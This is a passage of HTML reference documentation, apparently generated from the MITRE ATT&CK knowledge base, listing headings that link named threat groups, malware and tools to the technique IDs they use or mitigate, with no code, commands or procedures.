<h3 id="_backspace_s0031_uses_modify_registry_t1112"><a class="anchor" href="#_backspace_s0031_uses_modify_registry_t1112"></a><a class="link" href="#_backspace_s0031_uses_modify_registry_t1112">BACKSPACE (S0031) uses Modify Registry (T1112)</a></h3>
</div>
<div class="sect2">
<h3 id="_cleaver_g0003_uses_net_crawler_s0056"><a class="anchor" href="#_cleaver_g0003_uses_net_crawler_s0056"></a><a class="link" href="#_cleaver_g0003_uses_net_crawler_s0056">Cleaver (G0003) uses Net Crawler (S0056)</a></h3>
</div>
<div class="sect2">
<h3 id="_magic_hound_g0059_uses_obfuscated_files_or_information_t1027"><a class="anchor" href="#_magic_hound_g0059_uses_obfuscated_files_or_information_t1027"></a><a class="link" href="#_magic_hound_g0059_uses_obfuscated_files_or_information_t1027">Magic Hound (G0059) uses Obfuscated Files or Information (T1027)</a></h3>
</div>
<div class="sect2">
<h3 id="_shamoon_s0140_uses_remote_file_copy_t1105"><a class="anchor" href="#_shamoon_s0140_uses_remote_file_copy_t1105"></a><a class="link" href="#_shamoon_s0140_uses_remote_file_copy_t1105">Shamoon (S0140) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_reaver_s0172_uses_query_registry_t1012"><a class="anchor" href="#_reaver_s0172_uses_query_registry_t1012"></a><a class="link" href="#_reaver_s0172_uses_query_registry_t1012">Reaver (S0172) uses Query Registry (T1012)</a></h3>
</div>
<div class="sect2">
<h3 id="_powruner_s0184_uses_remote_file_copy_t1105"><a class="anchor" href="#_powruner_s0184_uses_remote_file_copy_t1105"></a><a class="link" href="#_powruner_s0184_uses_remote_file_copy_t1105">POWRUNER (S0184) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_soundbite_s0157_uses_application_window_discovery_t1010"><a class="anchor" href="#_soundbite_s0157_uses_application_window_discovery_t1010"></a><a class="link" href="#_soundbite_s0157_uses_application_window_discovery_t1010">SOUNDBITE (S0157) uses Application Window Discovery (T1010)</a></h3>
</div>
<div class="sect2">
<h3 id="_lowball_s0042_uses_remote_file_copy_t1105"><a class="anchor" href="#_lowball_s0042_uses_remote_file_copy_t1105"></a><a class="link" href="#_lowball_s0042_uses_remote_file_copy_t1105">LOWBALL (S0042) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_dustysky_s0062_uses_replication_through_removable_media_t1091"><a class="anchor" href="#_dustysky_s0062_uses_replication_through_removable_media_t1091"></a><a class="link" href="#_dustysky_s0062_uses_replication_through_removable_media_t1091">DustySky (S0062) uses Replication Through Removable Media (T1091)</a></h3>
</div>
<div class="sect2">
<h3 id="_dustysky_s0062_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_dustysky_s0062_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_dustysky_s0062_uses_registry_run_keys_start_folder_t1060">DustySky (S0062) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_system_time_discovery_mitigation_t1124_mitigates_system_time_discovery_t1124"><a class="anchor" href="#_system_time_discovery_mitigation_t1124_mitigates_system_time_discovery_t1124"></a><a class="link" href="#_system_time_discovery_mitigation_t1124_mitigates_system_time_discovery_t1124">System Time Discovery Mitigation (T1124) mitigates System Time Discovery (T1124)</a></h3>
</div>
<div class="sect2">
<h3 id="_callme_s0077_uses_exfiltration_over_command_and_control_channel_t1041"><a class="anchor" href="#_callme_s0077_uses_exfiltration_over_command_and_control_channel_t1041"></a><a class="link" href="#_callme_s0077_uses_exfiltration_over_command_and_control_channel_t1041">CallMe (S0077) uses Exfiltration Over Command and Control Channel (T1041)</a></h3>
</div>
<div class="sect2">
<h3 id="_xtunnel_s0117_uses_obfuscated_files_or_information_t1027"><a class="anchor" href="#_xtunnel_s0117_uses_obfuscated_files_or_information_t1027"></a><a class="link" href="#_xtunnel_s0117_uses_obfuscated_files_or_information_t1027">XTunnel (S0117) uses Obfuscated Files or Information (T1027)</a></h3>
</div>
<div class="sect2">
<h3 id="_powruner_s0184_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_powruner_s0184_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_powruner_s0184_uses_standard_application_layer_protocol_t1071">POWRUNER (S0184) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_zlib_s0086_uses_masquerading_t1036"><a class="anchor" href="#_zlib_s0086_uses_masquerading_t1036"></a><a class="link" href="#_zlib_s0086_uses_masquerading_t1036">ZLib (S0086) uses Masquerading (T1036)</a></h3>
</div>
<div class="sect2">
<h3 id="_3para_rat_s0066_uses_timestomp_t1099"><a class="anchor" href="#_3para_rat_s0066_uses_timestomp_t1099"></a><a class="link" href="#_3para_rat_s0066_uses_timestomp_t1099">3PARA RAT (S0066) uses Timestomp (T1099)</a></h3>
</div>
<div class="sect2">
<h3 id="_wiper_s0041_uses_third_party_software_t1072"><a class="anchor" href="#_wiper_s0041_uses_third_party_software_t1072"></a><a class="link" href="#_wiper_s0041_uses_third_party_software_t1072">Wiper (S0041) uses Third-party Software (T1072)</a></h3>
</div>
<div class="sect2">
<h3 id="_plugx_s0013_uses_standard_non_application_layer_protocol_t1095"><a class="anchor" href="#_plugx_s0013_uses_standard_non_application_layer_protocol_t1095"></a><a class="link" href="#_plugx_s0013_uses_standard_non_application_layer_protocol_t1095">PlugX (S0013) uses Standard Non-Application Layer Protocol (T1095)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt34_g0057_uses_certutil_s0160"><a class="anchor" href="#_apt34_g0057_uses_certutil_s0160"></a><a class="link" href="#_apt34_g0057_uses_certutil_s0160">APT34 (G0057) uses certutil (S0160)</a></h3>
</div>
<div class="sect2">
<h3 id="_lazarus_group_g0032_uses_data_compressed_t1002"><a class="anchor" href="#_lazarus_group_g0032_uses_data_compressed_t1002"></a><a class="link" href="#_lazarus_group_g0032_uses_data_compressed_t1002">Lazarus Group (G0032) uses Data Compressed (T1002)</a></h3>
</div>
<div class="sect2">
<h3 id="_usbstealer_s0136_uses_timestomp_t1099"><a class="anchor" href="#_usbstealer_s0136_uses_timestomp_t1099"></a><a class="link" href="#_usbstealer_s0136_uses_timestomp_t1099">USBStealer (S0136) uses Timestomp (T1099)</a></h3>
</div>
<div class="sect2">
<h3 id="_pteranodon_s0147_uses_screen_capture_t1113"><a class="anchor" href="#_pteranodon_s0147_uses_screen_capture_t1113"></a><a class="link" href="#_pteranodon_s0147_uses_screen_capture_t1113">Pteranodon (S0147) uses Screen Capture (T1113)</a></h3>
</div>
<div class="sect2">
<h3 id="_naikon_g0019_uses_netsh_s0108"><a class="anchor" href="#_naikon_g0019_uses_netsh_s0108"></a><a class="link" href="#_naikon_g0019_uses_netsh_s0108">Naikon (G0019) uses netsh (S0108)</a></h3>
</div>
<div class="sect2">
<h3 id="_shamoon_s0140_uses_file_deletion_t1107"><a class="anchor" href="#_shamoon_s0140_uses_file_deletion_t1107"></a><a class="link" href="#_shamoon_s0140_uses_file_deletion_t1107">Shamoon (S0140) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_dynamic_data_exchange_mitigation_t1173_mitigates_dynamic_data_exchange_t1173"><a class="anchor" href="#_dynamic_data_exchange_mitigation_t1173_mitigates_dynamic_data_exchange_t1173"></a><a class="link" href="#_dynamic_data_exchange_mitigation_t1173_mitigates_dynamic_data_exchange_t1173">Dynamic Data Exchange Mitigation (T1173) mitigates Dynamic Data Exchange (T1173)</a></h3>
</div>
<div class="sect2">
<h3 id="_prikormka_s0113_uses_security_software_discovery_t1063"><a class="anchor" href="#_prikormka_s0113_uses_security_software_discovery_t1063"></a><a class="link" href="#_prikormka_s0113_uses_security_software_discovery_t1063">Prikormka (S0113) uses Security Software Discovery (T1063)</a></h3>
</div>
<div class="sect2">
<h3 id="_cloudduke_s0054_uses_web_service_t1102"><a class="anchor" href="#_cloudduke_s0054_uses_web_service_t1102"></a><a class="link" href="#_cloudduke_s0054_uses_web_service_t1102">CloudDuke (S0054) uses Web Service (T1102)</a></h3>
</div>
<div class="sect2">
<h3 id="_hidden_window_mitigation_t1143_mitigates_hidden_window_t1143"><a class="anchor" href="#_hidden_window_mitigation_t1143_mitigates_hidden_window_t1143"></a><a class="link" href="#_hidden_window_mitigation_t1143_mitigates_hidden_window_t1143">Hidden Window Mitigation (T1143) mitigates Hidden Window (T1143)</a></h3>
</div>
<div class="sect2">
<h3 id="_oilrig_g0049_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_oilrig_g0049_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_oilrig_g0049_uses_standard_application_layer_protocol_t1071">OilRig (G0049) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_seaduke_s0053_uses_windows_management_instrumentation_event_subscription_t1084"><a class="anchor" href="#_seaduke_s0053_uses_windows_management_instrumentation_event_subscription_t1084"></a><a class="link" href="#_seaduke_s0053_uses_windows_management_instrumentation_event_subscription_t1084">SeaDuke (S0053) uses Windows Management Instrumentation Event Subscription (T1084)</a></h3>
</div>
<div class="sect2">
<h3 id="_chches_s0144_uses_masquerading_t1036"><a class="anchor" href="#_chches_s0144_uses_masquerading_t1036"></a><a class="link" href="#_chches_s0144_uses_masquerading_t1036">ChChes (S0144) uses Masquerading (T1036)</a></h3>
</div>
<div class="sect2">
<h3 id="_moonwind_s0149_uses_system_time_discovery_t1124"><a class="anchor" href="#_moonwind_s0149_uses_system_time_discovery_t1124"></a><a class="link" href="#_moonwind_s0149_uses_system_time_discovery_t1124">MoonWind (S0149) uses System Time Discovery (T1124)</a></h3>
</div>
<div class="sect2">
<h3 id="_s_type_s0085_uses_account_discovery_t1087"><a class="anchor" href="#_s_type_s0085_uses_account_discovery_t1087"></a><a class="link" href="#_s_type_s0085_uses_account_discovery_t1087">S-Type (S0085) uses Account Discovery (T1087)</a></h3>
</div>
<div class="sect2">
<h3 id="_sakula_s0074_uses_obfuscated_files_or_information_t1027"><a class="anchor" href="#_sakula_s0074_uses_obfuscated_files_or_information_t1027"></a><a class="link" href="#_sakula_s0074_uses_obfuscated_files_or_information_t1027">Sakula (S0074) uses Obfuscated Files or Information (T1027)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt3_g0022_uses_data_staged_t1074"><a class="anchor" href="#_apt3_g0022_uses_data_staged_t1074"></a><a class="link" href="#_apt3_g0022_uses_data_staged_t1074">APT3 (G0022) uses Data Staged (T1074)</a></h3>
</div>
<div class="sect2">
<h3 id="_menupass_g0045_uses_connection_proxy_t1090"><a class="anchor" href="#_menupass_g0045_uses_connection_proxy_t1090"></a><a class="link" href="#_menupass_g0045_uses_connection_proxy_t1090">menuPass (G0045) uses Connection Proxy (T1090)</a></h3>
</div>
<div class="sect2">
<h3 id="_mis_type_s0084_uses_create_account_t1136"><a class="anchor" href="#_mis_type_s0084_uses_create_account_t1136"></a><a class="link" href="#_mis_type_s0084_uses_create_account_t1136">Mis-Type (S0084) uses Create Account (T1136)</a></h3>
</div>
<div class="sect2">
<h3 id="_derusbi_s0021_uses_regsvr32_t1117"><a class="anchor" href="#_derusbi_s0021_uses_regsvr32_t1117"></a><a class="link" href="#_derusbi_s0021_uses_regsvr32_t1117">Derusbi (S0021) uses Regsvr32 (T1117)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt34_g0057_uses_remote_desktop_protocol_t1076"><a class="anchor" href="#_apt34_g0057_uses_remote_desktop_protocol_t1076"></a><a class="link" href="#_apt34_g0057_uses_remote_desktop_protocol_t1076">APT34 (G0057) uses Remote Desktop Protocol (T1076)</a></h3>
</div>
<div class="sect2">
<h3 id="_sykipot_s0018_uses_system_network_configuration_discovery_t1016"><a class="anchor" href="#_sykipot_s0018_uses_system_network_configuration_discovery_t1016"></a><a class="link" href="#_sykipot_s0018_uses_system_network_configuration_discovery_t1016">Sykipot (S0018) uses System Network Configuration Discovery (T1016)</a></h3>
</div>
<div class="sect2">
<h3 id="_plugx_s0013_uses_commonly_used_port_t1043"><a class="anchor" href="#_plugx_s0013_uses_commonly_used_port_t1043"></a><a class="link" href="#_plugx_s0013_uses_commonly_used_port_t1043">PlugX (S0013) uses Commonly Used Port (T1043)</a></h3>
</div>
<div class="sect2">
<h3 id="_badnews_s0128_uses_peripheral_device_discovery_t1120"><a class="anchor" href="#_badnews_s0128_uses_peripheral_device_discovery_t1120"></a><a class="link" href="#_badnews_s0128_uses_peripheral_device_discovery_t1120">BADNEWS (S0128) uses Peripheral Device Discovery (T1120)</a></h3>
</div>
<div class="sect2">
<h3 id="_remsec_s0125_uses_data_from_removable_media_t1025"><a class="anchor" href="#_remsec_s0125_uses_data_from_removable_media_t1025"></a><a class="link" href="#_remsec_s0125_uses_data_from_removable_media_t1025">Remsec (S0125) uses Data from Removable Media (T1025)</a></h3>
</div>
<div class="sect2">
<h3 id="_backspace_s0031_uses_data_obfuscation_t1001"><a class="anchor" href="#_backspace_s0031_uses_data_obfuscation_t1001"></a><a class="link" href="#_backspace_s0031_uses_data_obfuscation_t1001">BACKSPACE (S0031) uses Data Obfuscation (T1001)</a></h3>
</div>
<div class="sect2">
<h3 id="_hammertoss_s0037_uses_data_obfuscation_t1001"><a class="anchor" href="#_hammertoss_s0037_uses_data_obfuscation_t1001"></a><a class="link" href="#_hammertoss_s0037_uses_data_obfuscation_t1001">HAMMERTOSS (S0037) uses Data Obfuscation (T1001)</a></h3>
</div>
<div class="sect2">
<h3 id="_t9000_s0098_uses_screen_capture_t1113"><a class="anchor" href="#_t9000_s0098_uses_screen_capture_t1113"></a><a class="link" href="#_t9000_s0098_uses_screen_capture_t1113">T9000 (S0098) uses Screen Capture (T1113)</a></h3>
</div>
<div class="sect2">
<h3 id="_httpbrowser_s0070_uses_dll_search_order_hijacking_t1038"><a class="anchor" href="#_httpbrowser_s0070_uses_dll_search_order_hijacking_t1038"></a><a class="link" href="#_httpbrowser_s0070_uses_dll_search_order_hijacking_t1038">HTTPBrowser (S0070) uses DLL Search Order Hijacking (T1038)</a></h3>
</div>
<div class="sect2">
<h3 id="_3para_rat_s0066_uses_custom_cryptographic_protocol_t1024"><a class="anchor" href="#_3para_rat_s0066_uses_custom_cryptographic_protocol_t1024"></a><a class="link" href="#_3para_rat_s0066_uses_custom_cryptographic_protocol_t1024">3PARA RAT (S0066) uses Custom Cryptographic Protocol (T1024)</a></h3>
</div>
<div class="sect2">
<h3 id="_derusbi_s0021_uses_commonly_used_port_t1043"><a class="anchor" href="#_derusbi_s0021_uses_commonly_used_port_t1043"></a><a class="link" href="#_derusbi_s0021_uses_commonly_used_port_t1043">Derusbi (S0021) uses Commonly Used Port (T1043)</a></h3>
</div>
<div class="sect2">
<h3 id="_nidiran_s0118_uses_remote_file_copy_t1105"><a class="anchor" href="#_nidiran_s0118_uses_remote_file_copy_t1105"></a><a class="link" href="#_nidiran_s0118_uses_remote_file_copy_t1105">Nidiran (S0118) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_plugx_s0013_uses_masquerading_t1036"><a class="anchor" href="#_plugx_s0013_uses_masquerading_t1036"></a><a class="link" href="#_plugx_s0013_uses_masquerading_t1036">PlugX (S0013) uses Masquerading (T1036)</a></h3>
</div>
<div class="sect2">
<h3 id="_chches_s0144_uses_credential_dumping_t1003"><a class="anchor" href="#_chches_s0144_uses_credential_dumping_t1003"></a><a class="link" href="#_chches_s0144_uses_credential_dumping_t1003">ChChes (S0144) uses Credential Dumping (T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_halfbaked_s0151_uses_system_information_discovery_t1082"><a class="anchor" href="#_halfbaked_s0151_uses_system_information_discovery_t1082"></a><a class="link" href="#_halfbaked_s0151_uses_system_information_discovery_t1082">HALFBAKED (S0151) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_cobalt_strike_s0154_uses_distributed_component_object_model_t1175"><a class="anchor" href="#_cobalt_strike_s0154_uses_distributed_component_object_model_t1175"></a><a class="link" href="#_cobalt_strike_s0154_uses_distributed_component_object_model_t1175">Cobalt Strike (S0154) uses Distributed Component Object Model (T1175)</a></h3>
</div>
<div class="sect2">
<h3 id="_duqu_s0038_uses_data_staged_t1074"><a class="anchor" href="#_duqu_s0038_uses_data_staged_t1074"></a><a class="link" href="#_duqu_s0038_uses_data_staged_t1074">Duqu (S0038) uses Data Staged (T1074)</a></h3>
</div>
<div class="sect2">
<h3 id="_histcontrol_mitigation_t1148_mitigates_histcontrol_t1148"><a class="anchor" href="#_histcontrol_mitigation_t1148_mitigates_histcontrol_t1148"></a><a class="link" href="#_histcontrol_mitigation_t1148_mitigates_histcontrol_t1148">HISTCONTROL Mitigation (T1148) mitigates HISTCONTROL (T1148)</a></h3>
</div>
<div class="sect2">
<h3 id="_uacme_s0116_uses_bypass_user_account_control_t1088"><a class="anchor" href="#_uacme_s0116_uses_bypass_user_account_control_t1088"></a><a class="link" href="#_uacme_s0116_uses_bypass_user_account_control_t1088">UACMe (S0116) uses Bypass User Account Control (T1088)</a></h3>
</div>
<div class="sect2">
<h3 id="_helminth_s0170_uses_data_encoding_t1132"><a class="anchor" href="#_helminth_s0170_uses_data_encoding_t1132"></a><a class="link" href="#_helminth_s0170_uses_data_encoding_t1132">Helminth (S0170) uses Data Encoding (T1132)</a></h3>
</div>
<div class="sect2">
<h3 id="_copykittens_g0052_uses_data_encrypted_t1022"><a class="anchor" href="#_copykittens_g0052_uses_data_encrypted_t1022"></a><a class="link" href="#_copykittens_g0052_uses_data_encrypted_t1022">CopyKittens (G0052) uses Data Encrypted (T1022)</a></h3>
</div>
<div class="sect2">
<h3 id="_cobalt_strike_s0154_uses_remote_services_t1021"><a class="anchor" href="#_cobalt_strike_s0154_uses_remote_services_t1021"></a><a class="link" href="#_cobalt_strike_s0154_uses_remote_services_t1021">Cobalt Strike (S0154) uses Remote Services (T1021)</a></h3>
</div>
<div class="sect2">
<h3 id="_suckfly_g0039_uses_valid_accounts_t1078"><a class="anchor" href="#_suckfly_g0039_uses_valid_accounts_t1078"></a><a class="link" href="#_suckfly_g0039_uses_valid_accounts_t1078">Suckfly (G0039) uses Valid Accounts (T1078)</a></h3>
</div>
<div class="sect2">
<h3 id="_menupass_g0045_uses_data_staged_t1074"><a class="anchor" href="#_menupass_g0045_uses_data_staged_t1074"></a><a class="link" href="#_menupass_g0045_uses_data_staged_t1074">menuPass (G0045) uses Data Staged (T1074)</a></h3>
</div>
<div class="sect2">
<h3 id="_usbstealer_s0136_uses_replication_through_removable_media_t1091"><a class="anchor" href="#_usbstealer_s0136_uses_replication_through_removable_media_t1091"></a><a class="link" href="#_usbstealer_s0136_uses_replication_through_removable_media_t1091">USBStealer (S0136) uses Replication Through Removable Media (T1091)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt34_g0057_uses_netstat_s0104"><a class="anchor" href="#_apt34_g0057_uses_netstat_s0104"></a><a class="link" href="#_apt34_g0057_uses_netstat_s0104">APT34 (G0057) uses netstat (S0104)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt1_g0006_uses_data_from_local_system_t1005"><a class="anchor" href="#_apt1_g0006_uses_data_from_local_system_t1005"></a><a class="link" href="#_apt1_g0006_uses_data_from_local_system_t1005">APT1 (G0006) uses Data from Local System (T1005)</a></h3>
</div>
<div class="sect2">
<h3 id="_gazer_s0168_uses_process_injection_t1055"><a class="anchor" href="#_gazer_s0168_uses_process_injection_t1055"></a><a class="link" href="#_gazer_s0168_uses_process_injection_t1055">Gazer (S0168) uses Process Injection (T1055)</a></h3>
</div>
<div class="sect2">
<h3 id="_winnti_s0141_uses_rundll32_t1085"><a class="anchor" href="#_winnti_s0141_uses_rundll32_t1085"></a><a class="link" href="#_winnti_s0141_uses_rundll32_t1085">Winnti (S0141) uses Rundll32 (T1085)</a></h3>
</div>
<div class="sect2">
<h3 id="_misdat_s0083_uses_file_deletion_t1107"><a class="anchor" href="#_misdat_s0083_uses_file_deletion_t1107"></a><a class="link" href="#_misdat_s0083_uses_file_deletion_t1107">Misdat (S0083) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_advstoreshell_s0045_uses_system_information_discovery_t1082"><a class="anchor" href="#_advstoreshell_s0045_uses_system_information_discovery_t1082"></a><a class="link" href="#_advstoreshell_s0045_uses_system_information_discovery_t1082">ADVSTORESHELL (S0045) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_matroyshka_s0167_uses_rundll32_t1085"><a class="anchor" href="#_matroyshka_s0167_uses_rundll32_t1085"></a><a class="link" href="#_matroyshka_s0167_uses_rundll32_t1085">Matroyshka (S0167) uses Rundll32 (T1085)</a></h3>
</div>
<div class="sect2">
<h3 id="_shamoon_s0140_uses_system_information_discovery_t1082"><a class="anchor" href="#_shamoon_s0140_uses_system_information_discovery_t1082"></a><a class="link" href="#_shamoon_s0140_uses_system_information_discovery_t1082">Shamoon (S0140) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_komplex_s0162"><a class="anchor" href="#_apt28_g0007_uses_komplex_s0162"></a><a class="link" href="#_apt28_g0007_uses_komplex_s0162">APT28 (G0007) uses Komplex (S0162)</a></h3>
</div>
<div class="sect2">
<h3 id="_bronze_butler_g0060_uses_remote_file_copy_t1105"><a class="anchor" href="#_bronze_butler_g0060_uses_remote_file_copy_t1105"></a><a class="link" href="#_bronze_butler_g0060_uses_remote_file_copy_t1105">BRONZE BUTLER (G0060) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_turla_g0010_uses_process_discovery_t1057"><a class="anchor" href="#_turla_g0010_uses_process_discovery_t1057"></a><a class="link" href="#_turla_g0010_uses_process_discovery_t1057">Turla (G0010) uses Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt3_g0022_uses_credential_dumping_t1003"><a class="anchor" href="#_apt3_g0022_uses_credential_dumping_t1003"></a><a class="link" href="#_apt3_g0022_uses_credential_dumping_t1003">APT3 (G0022) uses Credential Dumping (T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_threat_group_3390_g0027_uses_network_share_connection_removal_t1126"><a class="anchor" href="#_threat_group_3390_g0027_uses_network_share_connection_removal_t1126"></a><a class="link" href="#_threat_group_3390_g0027_uses_network_share_connection_removal_t1126">Threat Group-3390 (G0027) uses Network Share Connection Removal (T1126)</a></h3>
</div>
<div class="sect2">
<h3 id="_dragonfly_g0035_uses_web_shell_t1100"><a class="anchor" href="#_dragonfly_g0035_uses_web_shell_t1100"></a><a class="link" href="#_dragonfly_g0035_uses_web_shell_t1100">Dragonfly (G0035) uses Web Shell (T1100)</a></h3>
</div>
<div class="sect2">
<h3 id="_indicator_removal_from_tools_mitigation_t1066_mitigates_indicator_removal_from_tools_t1066"><a class="anchor" href="#_indicator_removal_from_tools_mitigation_t1066_mitigates_indicator_removal_from_tools_t1066"></a><a class="link" href="#_indicator_removal_from_tools_mitigation_t1066_mitigates_indicator_removal_from_tools_t1066">Indicator Removal from Tools Mitigation (T1066) mitigates Indicator Removal from Tools (T1066)</a></h3>
</div>
<div class="sect2">
<h3 id="_stealth_falcon_g0038_uses_system_owner_user_discovery_t1033"><a class="anchor" href="#_stealth_falcon_g0038_uses_system_owner_user_discovery_t1033"></a><a class="link" href="#_stealth_falcon_g0038_uses_system_owner_user_discovery_t1033">Stealth Falcon (G0038) uses System Owner/User Discovery (T1033)</a></h3>
</div>
<div class="sect2">
<h3 id="_neteagle_s0034_uses_command_line_interface_t1059"><a class="anchor" href="#_neteagle_s0034_uses_command_line_interface_t1059"></a><a class="link" href="#_neteagle_s0034_uses_command_line_interface_t1059">NETEAGLE (S0034) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_unknown_logger_s0130_uses_remote_file_copy_t1105"><a class="anchor" href="#_unknown_logger_s0130_uses_remote_file_copy_t1105"></a><a class="link" href="#_unknown_logger_s0130_uses_remote_file_copy_t1105">Unknown Logger (S0130) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_lowball_s0042_uses_web_service_t1102"><a class="anchor" href="#_lowball_s0042_uses_web_service_t1102"></a><a class="link" href="#_lowball_s0042_uses_web_service_t1102">LOWBALL (S0042) uses Web Service (T1102)</a></h3>
</div>
<div class="sect2">
<h3 id="_remsec_s0125_uses_scheduled_task_t1053"><a class="anchor" href="#_remsec_s0125_uses_scheduled_task_t1053"></a><a class="link" href="#_remsec_s0125_uses_scheduled_task_t1053">Remsec (S0125) uses Scheduled Task (T1053)</a></h3>
</div>
<div class="sect2">
<h3 id="_remsec_s0125_uses_exfiltration_over_alternative_protocol_t1048"><a class="anchor" href="#_remsec_s0125_uses_exfiltration_over_alternative_protocol_t1048"></a><a class="link" href="#_remsec_s0125_uses_exfiltration_over_alternative_protocol_t1048">Remsec (S0125) uses Exfiltration Over Alternative Protocol (T1048)</a></h3>
</div>
<div class="sect2">
<h3 id="_bronze_butler_g0060_uses_screen_capture_t1113"><a class="anchor" href="#_bronze_butler_g0060_uses_screen_capture_t1113"></a><a class="link" href="#_bronze_butler_g0060_uses_screen_capture_t1113">BRONZE BUTLER (G0060) uses Screen Capture (T1113)</a></h3>
</div>
<div class="sect2">
<h3 id="_blackenergy_s0089_uses_bypass_user_account_control_t1088"><a class="anchor" href="#_blackenergy_s0089_uses_bypass_user_account_control_t1088"></a><a class="link" href="#_blackenergy_s0089_uses_bypass_user_account_control_t1088">BlackEnergy (S0089) uses Bypass User Account Control (T1088)</a></h3>
</div>
<div class="sect2">
<h3 id="_bbsrat_s0127_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_bbsrat_s0127_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_bbsrat_s0127_uses_standard_application_layer_protocol_t1071">BBSRAT (S0127) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_nettraveler_s0033_uses_application_window_discovery_t1010"><a class="anchor" href="#_nettraveler_s0033_uses_application_window_discovery_t1010"></a><a class="link" href="#_nettraveler_s0033_uses_application_window_discovery_t1010">NetTraveler (S0033) uses Application Window Discovery (T1010)</a></h3>
</div>
<div class="sect2">
<h3 id="_cleaver_g0003_uses_psexec_s0029"><a class="anchor" href="#_cleaver_g0003_uses_psexec_s0029"></a><a class="link" href="#_cleaver_g0003_uses_psexec_s0029">Cleaver (G0003) uses PsExec (S0029)</a></h3>
</div>
<div class="sect2">
<h3 id="_coreshell_s0137_uses_obfuscated_files_or_information_t1027"><a class="anchor" href="#_coreshell_s0137_uses_obfuscated_files_or_information_t1027"></a><a class="link" href="#_coreshell_s0137_uses_obfuscated_files_or_information_t1027">CORESHELL (S0137) uses Obfuscated Files or Information (T1027)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin10_g0051_uses_remote_desktop_protocol_t1076"><a class="anchor" href="#_fin10_g0051_uses_remote_desktop_protocol_t1076"></a><a class="link" href="#_fin10_g0051_uses_remote_desktop_protocol_t1076">FIN10 (G0051) uses Remote Desktop Protocol (T1076)</a></h3>
</div>
<div class="sect2">
<h3 id="_fakem_s0076_uses_input_capture_t1056"><a class="anchor" href="#_fakem_s0076_uses_input_capture_t1056"></a><a class="link" href="#_fakem_s0076_uses_input_capture_t1056">FakeM (S0076) uses Input Capture (T1056)</a></h3>
</div>
<div class="sect2">
<h3 id="_responder_s0174_uses_llmnr_nbt_ns_poisoning_t1171"><a class="anchor" href="#_responder_s0174_uses_llmnr_nbt_ns_poisoning_t1171"></a><a class="link" href="#_responder_s0174_uses_llmnr_nbt_ns_poisoning_t1171">Responder (S0174) uses LLMNR/NBT-NS Poisoning (T1171)</a></h3>
</div>
<div class="sect2">
<h3 id="_monsoon_g0042_uses_badnews_s0128"><a class="anchor" href="#_monsoon_g0042_uses_badnews_s0128"></a><a class="link" href="#_monsoon_g0042_uses_badnews_s0128">MONSOON (G0042) uses BADNEWS (S0128)</a></h3>
</div>
<div class="sect2">
<h3 id="_sykipot_s0018_uses_process_discovery_t1057"><a class="anchor" href="#_sykipot_s0018_uses_process_discovery_t1057"></a><a class="link" href="#_sykipot_s0018_uses_process_discovery_t1057">Sykipot (S0018) uses Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_gcman_g0036_uses_remote_services_t1021"><a class="anchor" href="#_gcman_g0036_uses_remote_services_t1021"></a><a class="link" href="#_gcman_g0036_uses_remote_services_t1021">GCMAN (G0036) uses Remote Services (T1021)</a></h3>
</div>
<div class="sect2">
<h3 id="_seasharpee_s0185_uses_timestomp_t1099"><a class="anchor" href="#_seasharpee_s0185_uses_timestomp_t1099"></a><a class="link" href="#_seasharpee_s0185_uses_timestomp_t1099">SEASHARPEE (S0185) uses Timestomp (T1099)</a></h3>
</div>
<div class="sect2">
<h3 id="_dragonfly_g0035_uses_indicator_removal_on_host_t1070"><a class="anchor" href="#_dragonfly_g0035_uses_indicator_removal_on_host_t1070"></a><a class="link" href="#_dragonfly_g0035_uses_indicator_removal_on_host_t1070">Dragonfly (G0035) uses Indicator Removal on Host (T1070)</a></h3>
</div>
<div class="sect2">
<h3 id="_fallchill_s0181_uses_file_deletion_t1107"><a class="anchor" href="#_fallchill_s0181_uses_file_deletion_t1107"></a><a class="link" href="#_fallchill_s0181_uses_file_deletion_t1107">FALLCHILL (S0181) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_sakula_s0074_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_sakula_s0074_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_sakula_s0074_uses_registry_run_keys_start_folder_t1060">Sakula (S0074) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
